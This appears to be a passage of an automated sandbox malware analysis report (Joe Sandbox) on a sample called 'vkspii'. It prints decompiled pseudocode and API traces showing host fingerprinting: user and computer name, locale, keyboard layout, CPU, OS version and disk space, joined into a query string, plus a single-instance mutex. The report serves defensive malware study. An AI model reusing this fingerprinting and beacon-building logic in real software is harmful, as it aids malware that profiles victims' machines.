                                      • GetModuleHandleW.KERNEL32(ntdll.dll,RtlComputeCrc32), ref: 00407297
                                      • GetProcAddress.KERNEL32(00000000), ref: 0040729E
                                      • lstrlenW.KERNEL32(?), ref: 004072AE
                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 004072E1
                                      • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 00407338
                                      • GetDriveTypeW.KERNEL32(?), ref: 0040737D
                                      • lstrcatW.KERNEL32(?,?), ref: 004073A4
                                      • lstrcatW.KERNEL32(?,0041073C), ref: 004073B6
                                      • lstrcatW.KERNEL32(?,004107B0), ref: 004073C0
                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,00000000,00404590), ref: 004073D6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$Alloc$wsprintf$CloseOpenQueryValue$ErrorFreeLastlstrcat$Namelstrlen$AddressComputerDirectoryDiskDriveHandleInfoInformationModuleNativeProcSpaceSystemTypeUserVolumeWindowslstrcmpi
                                      • String ID: %I64u$%I64u/$00000419$?:\$@$ARM$Control Panel\International$Domain$HARDWARE\DESCRIPTION\System\CentralProcessor\0$Identifier$Itanium$Keyboard Layout\Preload$LocaleName$ProcessorNameString$RtlComputeCrc32$SOFTWARE\Microsoft\Windows NT\CurrentVersion$SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion$SYSTEM\CurrentControlSet\services\Tcpip\Parameters$Unknown$WORKGROUP$error$ntdll.dll$productName$undefined$x64$x86
                                      • API String ID: 2088797152-983031137
                                      • Opcode ID: 4b4486b9acf773ae0f847d189a5d2366a2d9619d22d80a8bcc30b947846ab7ea
                                      • Instruction ID: bc76af88716f23ffac07bfdbeb53bd65fae384ef587bd9da7bafbc6315d7b6d0
                                      • Opcode Fuzzy Hash: 4b4486b9acf773ae0f847d189a5d2366a2d9619d22d80a8bcc30b947846ab7ea
                                      • Instruction Fuzzy Hash: 5A228570A40305AFEB209FA0CD49FAE7BB5FF04704F10442AF641B62E1D7B9A995CB59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 98 4069a0-4069b8 99 4069ba-4069da lstrcatW * 4 98->99 100 4069dc-4069df 98->100 99->100 101 4069e1-4069fb lstrcatW * 4 100->101 102 4069fd-406a01 100->102 101->102 103 406a03-406a1d lstrcatW * 4 102->103 104 406a1f-406a23 102->104 103->104 105 406a41-406a45 104->105 106 406a25-406a3f lstrcatW * 4 104->106 107 406a63-406a67 105->107 108 406a47-406a61 lstrcatW * 4 105->108 106->105 109 406a85-406a89 107->109 110 406a69-406a83 lstrcatW * 4 107->110 108->107 111 406aa7-406aab 109->111 112 406a8b-406aa5 lstrcatW * 4 109->112 110->109 113 406ac9-406acd 111->113 114 406aad-406ac7 lstrcatW * 4 111->114 112->111 115 406aeb-406aef 113->115 116 406acf-406ae9 lstrcatW * 4 113->116 114->113 117 406af1-406b0a VirtualAlloc 115->117 118 406b5c-406b60 115->118 116->115 121 406b21-406b2d wsprintfW 117->121 122 406b0c-406b1f wsprintfW 117->122 119 406b62-406b7c lstrcatW * 4 118->119 120 406b7e-406b92 lstrlenW 118->120 119->120 123 406b30-406b56 lstrcatW * 4 VirtualFree 121->123 122->123 123->118
                                      C-Code - Quality: 100%
                                      			E004069A0(intOrPtr* __ecx, WCHAR* _a4) {
                                      				WCHAR* _t47;
                                      				intOrPtr* _t91;
                                      				intOrPtr _t94;
                                      				WCHAR* _t96;
                                      
                                      				_t91 = __ecx;
                                      				_t96 = _a4;
                                      				if( *((intOrPtr*)(__ecx + 0x80)) != 0) {
                                      					lstrcatW(_t96,  *(__ecx + 0x88));
                                      					lstrcatW(_t96, "=");
                                      					lstrcatW(_t96,  *(_t91 + 0x84));
                                      					lstrcatW(_t96, "&");
                                      				}
                                      				if( *_t91 != 0) {
                                      					lstrcatW(_t96,  *(_t91 + 4));
                                      					lstrcatW(_t96, "=");
                                      					lstrcatW(_t96,  *(_t91 + 8));
                                      					lstrcatW(_t96, "&");
                                      				}
                                      				if( *((intOrPtr*)(_t91 + 0xc)) != 0) {
                                      					lstrcatW(_t96,  *(_t91 + 0x10));
                                      					lstrcatW(_t96, "=");
                                      					lstrcatW(_t96,  *(_t91 + 0x14));
                                      					lstrcatW(_t96, "&");
                                      				}
                                      				if( *((intOrPtr*)(_t91 + 0x18)) != 0) {
                                      					lstrcatW(_t96,  *(_t91 + 0x1c));
                                      					lstrcatW(_t96, "=");
                                      					lstrcatW(_t96,  *(_t91 + 0x20));
                                      					lstrcatW(_t96, "&");
                                      				}
                                      				if( *((intOrPtr*)(_t91 + 0x24)) != 0) {
                                      					lstrcatW(_t96,  *(_t91 + 0x28));
                                      					lstrcatW(_t96, "=");
                                      					lstrcatW(_t96,  *(_t91 + 0x2c));
                                      					lstrcatW(_t96, "&");
                                      				}
                                      				if( *((intOrPtr*)(_t91 + 0x30)) != 0) {
                                      					lstrcatW(_t96,  *(_t91 + 0x34));
                                      					lstrcatW(_t96, "=");
                                      					lstrcatW(_t96,  *(_t91 + 0x38));
                                      					lstrcatW(_t96, "&");
                                      				}
                                      				if( *((intOrPtr*)(_t91 + 0x3c)) != 0) {
                                      					lstrcatW(_t96,  *(_t91 + 0x40));
                                      					lstrcatW(_t96, "=");
                                      					lstrcatW(_t96,  *(_t91 + 0x44));
                                      					lstrcatW(_t96, "&");
                                      				}
                                      				if( *((intOrPtr*)(_t91 + 0x48)) != 0) {
                                      					lstrcatW(_t96,  *(_t91 + 0x4c));
                                      					lstrcatW(_t96, "=");
                                      					lstrcatW(_t96,  *(_t91 + 0x50));
                                      					lstrcatW(_t96, "&");
                                      				}
                                      				if( *((intOrPtr*)(_t91 + 0x54)) != 0) {
                                      					lstrcatW(_t96,  *(_t91 + 0x58));
                                      					lstrcatW(_t96, "=");
                                      					lstrcatW(_t96,  *(_t91 + 0x5c));
                                      					lstrcatW(_t96, "&");
                                      				}
                                      				if( *((intOrPtr*)(_t91 + 0x60)) != 0) {
                                      					_t47 = VirtualAlloc(0, 0x42, 0x3000, 0x40); // executed
                                      					_t94 =  *((intOrPtr*)(_t91 + 0x6c));
                                      					_a4 = _t47;
                                      					if(_t94 == 0) {
                                      						wsprintfW(_t47, L"undefined");
                                      					} else {
                                      						wsprintfW(_t47, L"%x%x", _t94,  *((intOrPtr*)(_t91 + 0x70)));
                                      					}
                                      					lstrcatW(_t96,  *(_t91 + 0x64));
                                      					lstrcatW(_t96, "=");
                                      					lstrcatW(_t96, _a4);
                                      					lstrcatW(_t96, "&");
                                      					VirtualFree(_a4, 0, 0x8000); // executed
                                      				}
                                      				if( *((intOrPtr*)(_t91 + 0x74)) != 0) {
                                      					lstrcatW(_t96,  *(_t91 + 0x78));
                                      					lstrcatW(_t96, "=");
                                      					lstrcatW(_t96,  *(_t91 + 0x7c));
                                      					lstrcatW(_t96, "&");
                                      				}
                                      				 *((short*)(_t96 + lstrlenW(_t96) * 2 - 2)) = 0;
                                      				return _t96;
                                      			}







                                      0x004069a4
                                      0x004069a7
                                      0x004069b8
                                      0x004069c1
                                      0x004069c9
                                      0x004069d2
                                      0x004069da
                                      0x004069da
                                      0x004069df
                                      0x004069e5
                                      0x004069ed
                                      0x004069f3
                                      0x004069fb
                                      0x004069fb
                                      0x00406a01
                                      0x00406a07
                                      0x00406a0f
                                      0x00406a15
                                      0x00406a1d
                                      0x00406a1d
                                      0x00406a23
                                      0x00406a29
                                      0x00406a31
                                      0x00406a37
                                      0x00406a3f
                                      0x00406a3f
                                      0x00406a45
                                      0x00406a4b
                                      0x00406a53
                                      0x00406a59
                                      0x00406a61
                                      0x00406a61
                                      0x00406a67
                                      0x00406a6d
                                      0x00406a75
                                      0x00406a7b
                                      0x00406a83
                                      0x00406a83
                                      0x00406a89
                                      0x00406a8f
                                      0x00406a97
                                      0x00406a9d
                                      0x00406aa5
                                      0x00406aa5
                                      0x00406aab
                                      0x00406ab1
                                      0x00406ab9
                                      0x00406abf
                                      0x00406ac7
                                      0x00406ac7
                                      0x00406acd
                                      0x00406ad3
                                      0x00406adb
                                      0x00406ae1
                                      0x00406ae9
                                      0x00406ae9
                                      0x00406aef
                                      0x00406afc
                                      0x00406b02
                                      0x00406b05
                                      0x00406b0a
                                      0x00406b27
                                      0x00406b0c
                                      0x00406b16
                                      0x00406b1c
                                      0x00406b34
                                      0x00406b3c
                                      0x00406b42
                                      0x00406b4a
                                      0x00406b56
                                      0x00406b56
                                      0x00406b60
                                      0x00406b66
                                      0x00406b6e
                                      0x00406b74
                                      0x00406b7c
                                      0x00406b7c
                                      0x00406b88
                                      0x00406b92

                                      APIs
                                      • lstrcatW.KERNEL32(?,?), ref: 004069C1
                                      • lstrcatW.KERNEL32(?,004103F0), ref: 004069C9
                                      • lstrcatW.KERNEL32(?,?), ref: 004069D2
                                      • lstrcatW.KERNEL32(?,004103F4), ref: 004069DA
                                      • lstrcatW.KERNEL32(?,?), ref: 004069E5
                                      • lstrcatW.KERNEL32(?,004103F0), ref: 004069ED
                                      • lstrcatW.KERNEL32(?,?), ref: 004069F3
                                      • lstrcatW.KERNEL32(?,004103F4), ref: 004069FB
                                      • lstrcatW.KERNEL32(?,?), ref: 00406A07
                                      • lstrcatW.KERNEL32(?,004103F0), ref: 00406A0F
                                      • lstrcatW.KERNEL32(?,?), ref: 00406A15
                                      • lstrcatW.KERNEL32(?,004103F4), ref: 00406A1D
                                      • lstrcatW.KERNEL32(?,?), ref: 00406A29
                                      • lstrcatW.KERNEL32(?,004103F0), ref: 00406A31
                                      • lstrcatW.KERNEL32(?,?), ref: 00406A37
                                      • lstrcatW.KERNEL32(?,004103F4), ref: 00406A3F
                                      • lstrcatW.KERNEL32(?,?), ref: 00406A4B
                                      • lstrcatW.KERNEL32(?,004103F0), ref: 00406A53
                                      • lstrcatW.KERNEL32(?,?), ref: 00406A59
                                      • lstrcatW.KERNEL32(?,004103F4), ref: 00406A61
                                      • lstrcatW.KERNEL32(?,?), ref: 00406A6D
                                      • lstrcatW.KERNEL32(?,004103F0), ref: 00406A75
                                      • lstrcatW.KERNEL32(?,004048B6), ref: 00406A7B
                                      • lstrcatW.KERNEL32(?,004103F4), ref: 00406A83
                                      • lstrcatW.KERNEL32(?,?), ref: 00406A8F
                                      • lstrcatW.KERNEL32(?,004103F0), ref: 00406A97
                                      • lstrcatW.KERNEL32(?,?), ref: 00406A9D
                                      • lstrcatW.KERNEL32(?,004103F4), ref: 00406AA5
                                      • lstrcatW.KERNEL32(?,?), ref: 00406AB1
                                      • lstrcatW.KERNEL32(?,004103F0), ref: 00406AB9
                                      • lstrcatW.KERNEL32(?,?), ref: 00406ABF
                                      • lstrcatW.KERNEL32(?,004103F4), ref: 00406AC7
                                      • lstrcatW.KERNEL32(?,?), ref: 00406AD3
                                      • lstrcatW.KERNEL32(?,004103F0), ref: 00406ADB
                                      • lstrcatW.KERNEL32(?,?), ref: 00406AE1
                                      • lstrcatW.KERNEL32(?,004103F4), ref: 00406AE9
                                      • VirtualAlloc.KERNELBASE(00000000,00000042,00003000,00000040,00000000,00000000,?,?,004045E9,00000000,?,00003000,00000040,00000000,?,00000000), ref: 00406AFC
                                      • wsprintfW.USER32 ref: 00406B16
                                      • wsprintfW.USER32 ref: 00406B27
                                      • lstrcatW.KERNEL32(?,?), ref: 00406B34
                                      • lstrcatW.KERNEL32(?,004103F0), ref: 00406B3C
                                      • lstrcatW.KERNEL32(?,?), ref: 00406B42
                                      • lstrcatW.KERNEL32(?,004103F4), ref: 00406B4A
                                      • VirtualFree.KERNELBASE(?,00000000,00008000,?,00000000,00000000,?,00000000), ref: 00406B56
                                      • lstrcatW.KERNEL32(?,?), ref: 00406B66
                                      • lstrcatW.KERNEL32(?,004103F0), ref: 00406B6E
                                      • lstrcatW.KERNEL32(?,?), ref: 00406B74
                                      • lstrcatW.KERNEL32(?,004103F4), ref: 00406B7C
                                      • lstrlenW.KERNEL32(?,00000000,00000000,?,?,004045E9,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00406B7F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Virtualwsprintf$AllocFreelstrlen
                                      • String ID: %x%x$undefined
                                      • API String ID: 3872469520-3801831566
                                      • Opcode ID: b4ce8e6092dab11b5570eb4b7fe377be8a76f675d54b5694e6accb4a7b5be685
                                      • Instruction ID: 157d45b09fe4d6cbf2a129cbf998294f04408a9e253f235917979037099c56e6
                                      • Opcode Fuzzy Hash: b4ce8e6092dab11b5570eb4b7fe377be8a76f675d54b5694e6accb4a7b5be685
                                      • Instruction Fuzzy Hash: 80511B31281669B7CB273B658C49FDF3A19EF86700F124061F91028096CFBD9592DEAE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 004039B0: GetProcessHeap.KERNEL32(?,?,00404587,00000000,?,00000000), ref: 00403A4C
                                        • Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 00406DB7
                                        • Part of subcall function 00406D90: GetUserNameW.ADVAPI32(00000000,?), ref: 00406DC8
                                        • Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 00406DE6
                                        • Part of subcall function 00406D90: GetComputerNameW.KERNEL32 ref: 00406DF0
                                        • Part of subcall function 00406D90: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 00406E10
                                        • Part of subcall function 00406D90: wsprintfW.USER32 ref: 00406E51
                                        • Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 00406E6E
                                        • Part of subcall function 00406D90: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 00406E92
                                        • Part of subcall function 00406D90: RegQueryValueExW.ADVAPI32(00000000,LocaleName,00000000,00000000,?,?), ref: 00406EB6
                                        • Part of subcall function 00406D90: RegCloseKey.ADVAPI32(00000000), ref: 00406ED2
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406BF2
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406BFD
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C13
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C1E
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(004048B6,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C34
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C3F
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C55
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C60
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C76
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C81
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C97
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CA2
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CC1
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CCC
                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004045AC
                                      • lstrcpyW.KERNEL32 ref: 004045CF
                                      • lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004045D6
                                      • CreateMutexW.KERNELBASE(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004045EE
                                      • GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004045FA
                                      • GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00404601
                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0040461B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$Virtual$Alloc$ErrorLastName$CloseComputerCreateFreeHeapMutexOpenProcessQueryUserValuelstrcpywsprintf
                                      • String ID: Global\
                                      • API String ID: 3131499543-188423391
                                      • Opcode ID: 60700ccbb66975790bdd6c2481cc6c90d6354a02fbe93d1c0f5e8eb0fcf3caff
                                      • Instruction ID: 4f5a3050133a9d70e6d79b6919bbb594e2943cbf5e181e58d482f905f9ddffb5
                                      • Opcode Fuzzy Hash: 60700ccbb66975790bdd6c2481cc6c90d6354a02fbe93d1c0f5e8eb0fcf3caff
                                      • Instruction Fuzzy Hash: 6721D4B16503217BE224A724DC4BF6F7A5CDB80744F500639F706761D0EAB87D0486EE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 198 407720-40772d 199 40773b-40773f 198->199 200 40772f-407739 VirtualFree 198->200 201 407741-40774b VirtualFree 199->201 202 40774d-407751 199->202 200->199 201->202 203 407753-40775d VirtualFree 202->203 204 40775f-407763 202->204 203->204 205 407771-407775 204->205 206 407765-40776f VirtualFree 204->206 207 407783-407787 205->207 208 407777-407781 VirtualFree 205->208 206->205 209 407795-407799 207->209 210 407789-407793 VirtualFree 207->210 208->207 211 4077a7-4077ab 209->211 212 40779b-4077a5 VirtualFree 209->212 210->209 213 4077b9-4077bd 211->213 214 4077ad-4077b7 VirtualFree 211->214 212->211 215 4077cb-4077d2 213->215 216 4077bf-4077c9 VirtualFree 213->216 214->213 217 4077e3-4077e5 215->217 218 4077d4-4077e1 VirtualFree 215->218 216->215 218->217
                                      C-Code - Quality: 100%
                                      			E00407720(intOrPtr* __ecx) {
                                      				int _t20;
                                      				intOrPtr* _t24;
                                      
                                      				_t24 = __ecx;
                                      				if( *__ecx != 0) {
                                      					_t20 = VirtualFree( *(__ecx + 8), 0, 0x8000);
                                      				}
                                      				if( *((intOrPtr*)(_t24 + 0xc)) != 0) {
                                      					_t20 = VirtualFree( *(_t24 + 0x14), 0, 0x8000);
                                      				}
                                      				if( *((intOrPtr*)(_t24 + 0x18)) != 0) {
                                      					_t20 = VirtualFree( *(_t24 + 0x20), 0, 0x8000); // executed
                                      				}
                                      				if( *((intOrPtr*)(_t24 + 0x30)) != 0) {
                                      					_t20 = VirtualFree( *(_t24 + 0x38), 0, 0x8000);
                                      				}
                                      				if( *((intOrPtr*)(_t24 + 0x3c)) != 0) {
                                      					_t20 = VirtualFree( *(_t24 + 0x44), 0, 0x8000);
                                      				}
                                      				if( *((intOrPtr*)(_t24 + 0x48)) != 0) {
                                      					_t20 = VirtualFree( *(_t24 + 0x50), 0, 0x8000);
                                      				}
                                      				if( *((intOrPtr*)(_t24 + 0x54)) != 0) {
                                      					_t20 = VirtualFree( *(_t24 + 0x5c), 0, 0x8000);
                                      				}
                                      				if( *((intOrPtr*)(_t24 + 0x24)) != 0) {
                                      					_t20 = VirtualFree( *(_t24 + 0x2c), 0, 0x8000);
                                      				}
                                      				if( *((intOrPtr*)(_t24 + 0x60)) != 0) {
                                      					_t20 = VirtualFree( *(_t24 + 0x68), 0, 0x8000); // executed
                                      				}
                                      				if( *((intOrPtr*)(_t24 + 0x80)) != 0) {
                                      					return VirtualFree( *(_t24 + 0x84), 0, 0x8000);
                                      				}
                                      				return _t20;
                                      			}





                                      0x00407721
                                      0x0040772d
                                      0x00407739
                                      0x00407739
                                      0x0040773f
                                      0x0040774b
                                      0x0040774b
                                      0x00407751
                                      0x0040775d
                                      0x0040775d
                                      0x00407763
                                      0x0040776f
                                      0x0040776f
                                      0x00407775
                                      0x00407781
                                      0x00407781
                                      0x00407787
                                      0x00407793
                                      0x00407793
                                      0x00407799
                                      0x004077a5
                                      0x004077a5
                                      0x004077ab
                                      0x004077b7
                                      0x004077b7
                                      0x004077bd
                                      0x004077c9
                                      0x004077c9
                                      0x004077d2
                                      0x00000000
                                      0x004077e1
                                      0x004077e5

                                      APIs
                                      • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00407739
                                      • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0040774B
                                      • VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0040775D
                                      • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0040776F
                                      • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00407781
                                      • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00407793
                                      • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004077A5
                                      • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004077B7
                                      • VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004077C9
                                      • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004077E1
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FreeVirtual
                                      • String ID:
                                      • API String ID: 1263568516-0
                                      • Opcode ID: 3fc008402963f2d3cbecf3a86f23b2e7ee5b4610d3041296055b4ddd3abf16a0
                                      • Instruction ID: 79a2428a1de1d862086b34f36251e2aa8ec78ad52842245a2806986d354140b0
                                      • Opcode Fuzzy Hash: 3fc008402963f2d3cbecf3a86f23b2e7ee5b4610d3041296055b4ddd3abf16a0
                                      • Instruction Fuzzy Hash: C7211C30280B04AAF7762B15CC4AF66B2E1BB40B45F254839F2C1395F08BF97889DF09
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      C-Code - Quality: 100%
                                      			E00406D10(void* __ecx, void* _a4, int _a8, short* _a12, char* _a16, short* _a20) {
                                      				void* _v8;
                                      				long _t14;
                                      				long _t18;
                                      
                                      				_t14 = RegOpenKeyExW(_a4, _a8, 0, 0x20019,  &_v8); // executed
                                      				if(_t14 != 0) {
                                      					return 0;
                                      				} else {
                                      					_a8 = _a20;
                                      					_t18 = RegQueryValueExW(_v8, _a12, 0, 0, _a16,  &_a8); // executed
                                      					if(_t18 != 0) {
                                      						GetLastError();
                                      						RegCloseKey(_v8);
                                      						return 0;
                                      					} else {
                                      						_t11 = _t18 + 1; // 0x1, executed
                                      						RegCloseKey(_v8); // executed
                                      						return _t11;
                                      					}
                                      				}
                                      			}






                                      0x00406d26
                                      0x00406d30
                                      0x00406d84
                                      0x00406d32
                                      0x00406d35
                                      0x00406d47
                                      0x00406d4f
                                      0x00406d66
                                      0x00406d6f
                                      0x00406d7b
                                      0x00406d51
                                      0x00406d54
                                      0x00406d57
                                      0x00406d63
                                      0x00406d63
                                      0x00406d4f

                                      APIs
                                      • RegOpenKeyExW.KERNELBASE(?,?,00000000,00020019,?,?,00000000,?,0040726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00406D26
                                      • RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000000,00000080,?,?,0040726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00406D47
                                      • RegCloseKey.KERNELBASE(?,?,0040726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00406D57
                                      • GetLastError.KERNEL32(?,0040726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00406D66
                                      • RegCloseKey.ADVAPI32(?,?,0040726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00406D6F
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Close$ErrorLastOpenQueryValue
                                      • String ID:
                                      • API String ID: 2437438455-0
                                      • Opcode ID: 9e6bb54fed31df0af1995cc1e5d9b2912871e352615202f1e244d14966f57426
                                      • Instruction ID: 038fbdeb07fc8f9d94efb3036f8b9b37cf4c52d37effb2f9ef8d9ff464795a08
                                      • Opcode Fuzzy Hash: 9e6bb54fed31df0af1995cc1e5d9b2912871e352615202f1e244d14966f57426
